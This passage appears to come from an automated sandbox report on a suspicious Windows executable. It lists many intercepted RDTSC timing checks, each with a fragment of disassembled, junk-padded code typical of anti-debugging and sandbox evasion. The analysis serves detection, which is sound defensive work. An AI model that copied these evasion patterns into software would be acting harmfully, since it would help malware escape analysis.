0x0000004c pushfd 0x0000004d jmp 00007FC22CC1B8ABh 0x00000052 xor cx, AEAEh 0x00000057 jmp 00007FC22CC1B8B9h 0x0000005c popfd 0x0000005d popad 0x0000005e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140297 second address: 514029D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 514029D second address: 51402B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test al, al 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop ebx 0x0000000f jmp 00007FC22CC1B8ACh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51402B9 second address: 51402BF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51402BF second address: 51402C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51402C3 second address: 5140302 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FC22D01EE4Dh 0x00000011 pushad 0x00000012 mov cx, bx 0x00000015 popad 0x00000016 lea ecx, dword ptr [ebp-14h] 0x00000019 jmp 00007FC22D01ECD5h 0x0000001e mov dword ptr [ebp-14h], edi 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140302 second address: 5140306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140306 second address: 514030A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 514030A second address: 5140310 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51403C8 second address: 51403CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51403CC second address: 51403E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51403E3 second address: 5140487 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 sub cx, 8FBEh 0x0000000e jmp 00007FC22D01ECD9h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 jg 00007FC29EB0CD38h 0x0000001f jmp 00007FC22D01ECCCh 0x00000024 js 00007FC22D01ECF7h 0x0000002a jmp 00007FC22D01ECD0h 0x0000002f cmp dword ptr [ebp-14h], edi 0x00000032 pushad 0x00000033 movzx ecx, di 0x00000036 push ebx 0x00000037 movzx ecx, bx 0x0000003a pop ebx 0x0000003b popad 0x0000003c jne 00007FC29EB0CD12h 0x00000042 jmp 00007FC22D01ECCEh 0x00000047 mov ebx, dword ptr [ebp+08h] 0x0000004a jmp 00007FC22D01ECD0h 0x0000004f lea eax, dword ptr [ebp-2Ch] 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007FC22D01ECCAh 0x0000005b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140487 second address: 5140496 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140496 second address: 51404C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22D01ECD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC22D01ECCDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51404C3 second address: 51404FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FC22CC1B8B1h 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22CC1B8ADh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51404FA second address: 5140558 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6A3D4A12h 0x00000008 pushfd 0x00000009 jmp 00007FC22D01ECD3h 0x0000000e sub si, 720Eh 0x00000013 jmp 00007FC22D01ECD9h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 pushfd 0x00000021 jmp 00007FC22D01ECCAh 0x00000026 add cx, 8088h 0x0000002b jmp 00007FC22D01ECCBh 0x00000030 popfd 0x00000031 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140558 second address: 5140617 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007FC22CC1B8B6h 0x0000000c sub ecx, 4760E2E8h 0x00000012 jmp 00007FC22CC1B8ABh 0x00000017 popfd 0x00000018 popad 0x00000019 push eax 0x0000001a pushad 0x0000001b pushfd 0x0000001c jmp 00007FC22CC1B8AFh 0x00000021 add si, DA2Eh 0x00000026 jmp 00007FC22CC1B8B9h 0x0000002b popfd 0x0000002c mov edx, eax 0x0000002e popad 0x0000002f nop 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FC22CC1B8B8h 0x00000037 and cl, FFFFFFD8h 0x0000003a jmp 00007FC22CC1B8ABh 0x0000003f popfd 0x00000040 mov esi, 2989AD8Fh 0x00000045 popad 0x00000046 xchg eax, ebx 0x00000047 jmp 00007FC22CC1B8B2h 0x0000004c push eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 jmp 00007FC22CC1B8B3h 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140617 second address: 514061D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 514067C second address: 51406AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 call 00007FC22CC1B8B7h 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC22CC1B8ABh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51406AC second address: 51307F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC22D01ECCFh 0x00000009 popad 0x0000000a je 00007FC29EB0CC5Bh 0x00000010 xor eax, eax 0x00000012 jmp 00007FC22CFF83FAh 0x00000017 pop esi 0x00000018 pop edi 0x00000019 pop ebx 0x0000001a leave 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 mov esi, eax 0x00000024 xor ebx, ebx 0x00000026 cmp esi, 00000000h 0x00000029 je 00007FC22D01EE05h 0x0000002f call 00007FC2317CB4F7h 0x00000034 mov edi, edi 0x00000036 pushad 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 51307F0 second address: 5130803 instructions: 0x00000000 rdtsc 0x00000002 call 00007FC22CC1B8AAh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5130803 second address: 513083D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push ecx 0x00000008 jmp 00007FC22D01ECD6h 0x0000000d mov dword ptr [esp], ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC22D01ECD7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 513083D second address: 5130879 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC22CC1B8ABh 0x0000000b xor esi, 0B459B0Eh 0x00000011 jmp 00007FC22CC1B8B9h 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5130879 second address: 513087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 513087D second address: 5130883 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5130883 second address: 51308DB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECD0h 0x00000008 mov dx, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ecx 0x0000000f pushad 0x00000010 mov esi, 34900AC9h 0x00000015 pushfd 0x00000016 jmp 00007FC22D01ECD6h 0x0000001b sbb eax, 25B9F718h 0x00000021 jmp 00007FC22D01ECCBh 0x00000026 popfd 0x00000027 popad 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov esi, 655FDCE1h 0x00000031 mov cx, 661Dh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140A99 second address: 5140AA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140AA9 second address: 5140AAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140AAD second address: 5140B11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC22CC1B8B8h 0x00000013 jmp 00007FC22CC1B8B5h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC22CC1B8B0h 0x0000001f jmp 00007FC22CC1B8B5h 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140B11 second address: 5140B17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140B17 second address: 5140B75 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b cmp dword ptr [76C8459Ch], 05h 0x00000012 jmp 00007FC22CC1B8B6h 0x00000017 je 00007FC29E6F9758h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, 13067270h 0x00000025 jmp 00007FC22CC1B8B9h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140C98 second address: 5140C9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140C9E second address: 5140CA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140D27 second address: 5140D59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC22D01ECCEh 0x00000008 call 00007FC22D01ECD2h 0x0000000d pop esi 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 je 00007FC29EAF28FDh 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140D59 second address: 5140D5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5140D5F second address: 5140D64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150A7A second address: 5150A7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150A7E second address: 5150A84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150A84 second address: 5150AB8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FC22CC1B8B0h 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov bx, 3D80h 0x00000016 popad 0x00000017 push eax 0x00000018 pushad 0x00000019 pushad 0x0000001a mov bl, al 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150AB8 second address: 5150B3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FC22D01ECD3h 0x0000000b adc ecx, 2DD8A55Eh 0x00000011 jmp 00007FC22D01ECD9h 0x00000016 popfd 0x00000017 popad 0x00000018 mov dword ptr [esp], esi 0x0000001b jmp 00007FC22D01ECCEh 0x00000020 mov esi, dword ptr [ebp+0Ch] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov cx, di 0x00000029 pushfd 0x0000002a jmp 00007FC22D01ECD9h 0x0000002f and esi, 1E5BD4F6h 0x00000035 jmp 00007FC22D01ECD1h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150B3F second address: 5150B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC22CC1B8B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test esi, esi 0x0000000b pushad 0x0000000c mov eax, 3DEF4973h 0x00000011 mov di, cx 0x00000014 popad 0x00000015 je 00007FC29E6E90FDh 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov ah, bh 0x00000020 pushad 0x00000021 popad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150B6E second address: 5150B74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 5150CE9 second address: 5150D01 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC22CC1B8B4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 651DFBB second address: 651DFD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jno 00007FC22D01ECC6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A2E6A second address: 66A2E73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A2E73 second address: 66A2E77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A21B0 second address: 66A21E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22CC1B8B8h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FC22CC1B8B1h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A21E3 second address: 66A21FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD4h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A2391 second address: 66A239B instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC22CC1B8ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A250D second address: 66A253E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FC22D01ECC6h 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 jnp 00007FC22D01ECE0h 0x00000017 jnl 00007FC22D01ECC6h 0x0000001d jmp 00007FC22D01ECD4h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A26BF second address: 66A26C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A26C3 second address: 66A26EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC22D01ECD8h 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007FC22D01ECC6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A26EB second address: 66A26EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A26EF second address: 66A26F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A47CE second address: 66A47D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A493E second address: 66A4A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC22D01ECD7h 0x0000000a popad 0x0000000b nop 0x0000000c jng 00007FC22D01ECC9h 0x00000012 mov cx, di 0x00000015 push 00000000h 0x00000017 call 00007FC22D01ECC9h 0x0000001c jno 00007FC22D01ECCAh 0x00000022 push eax 0x00000023 jc 00007FC22D01ECD4h 0x00000029 mov eax, dword ptr [esp+04h] 0x0000002d push ecx 0x0000002e pushad 0x0000002f jmp 00007FC22D01ECCAh 0x00000034 push eax 0x00000035 pop eax 0x00000036 popad 0x00000037 pop ecx 0x00000038 mov eax, dword ptr [eax] 0x0000003a jo 00007FC22D01ECCEh 0x00000040 jo 00007FC22D01ECC8h 0x00000046 pushad 0x00000047 popad 0x00000048 mov dword ptr [esp+04h], eax 0x0000004c push eax 0x0000004d jmp 00007FC22D01ECD3h 0x00000052 pop eax 0x00000053 pop eax 0x00000054 mov dword ptr [ebp+122D3B1Fh], ecx 0x0000005a mov edx, ecx 0x0000005c push 00000003h 0x0000005e mov cx, bx 0x00000061 push 00000000h 0x00000063 mov edi, 4C140527h 0x00000068 push 00000003h 0x0000006a call 00007FC22D01ECD0h 0x0000006f mov edi, dword ptr [ebp+122D2F7Dh] 0x00000075 pop esi 0x00000076 push 5FD3E9ECh 0x0000007b pushad 0x0000007c push eax 0x0000007d push edx 0x0000007e jbe 00007FC22D01ECC6h 0x00000084 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A4A08 second address: 66A4A6F instructions: 0x00000000 rdtsc 0x00000002 js 00007FC22CC1B8A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a js 00007FC22CC1B8A8h 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 add dword ptr [esp], 602C1614h 0x0000001a mov ecx, dword ptr [ebp+122D2ED9h] 0x00000020 lea ebx, dword ptr [ebp+1245A6B2h] 0x00000026 mov dword ptr [ebp+122D36AAh], ecx 0x0000002c xchg eax, ebx 0x0000002d push edx 0x0000002e push edi 0x0000002f je 00007FC22CC1B8A6h 0x00000035 pop edi 0x00000036 pop edx 0x00000037 push eax 0x00000038 pushad 0x00000039 pushad 0x0000003a jmp 00007FC22CC1B8B0h 0x0000003f jmp 00007FC22CC1B8B9h 0x00000044 popad 0x00000045 pushad 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A4AE8 second address: 66A4AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FC22D01ECC6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A4AF3 second address: 66A4AFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FC22CC1B8A6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A4AFD second address: 66A4B4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor edx, dword ptr [ebp+122D2CBDh] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FC22D01ECC8h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Ah 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d stc 0x0000002e mov dword ptr [ebp+122D3A72h], esi 0x00000034 sub dword ptr [ebp+122D3ACCh], eax 0x0000003a push ADF7B0D2h 0x0000003f pushad 0x00000040 je 00007FC22D01ECCCh 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A4B4D second address: 66A4B55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66A4C33 second address: 66A4C3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 6695CE6 second address: 6695CEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C4D53 second address: 66C4DA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FC22D01ECCDh 0x00000008 jmp 00007FC22D01ECD1h 0x0000000d pop eax 0x0000000e pushad 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 jmp 00007FC22D01ECCDh 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007FC22D01ECD6h 0x0000001d popad 0x0000001e pop edx 0x0000001f pop eax 0x00000020 pushad 0x00000021 push eax 0x00000022 push esi 0x00000023 pop esi 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C4DA9 second address: 66C4DAF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5173 second address: 66C5182 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jnc 00007FC22D01ECC6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C52ED second address: 66C52F9 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FC22CC1B8A6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C547E second address: 66C5483 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5973 second address: 66C5991 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FC22CC1B8B4h 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\0zBsv1tnt4.exe RDTSC instruction interceptor: First address: 66C5E42 second address: 66C5E4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FC22D01ECC6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
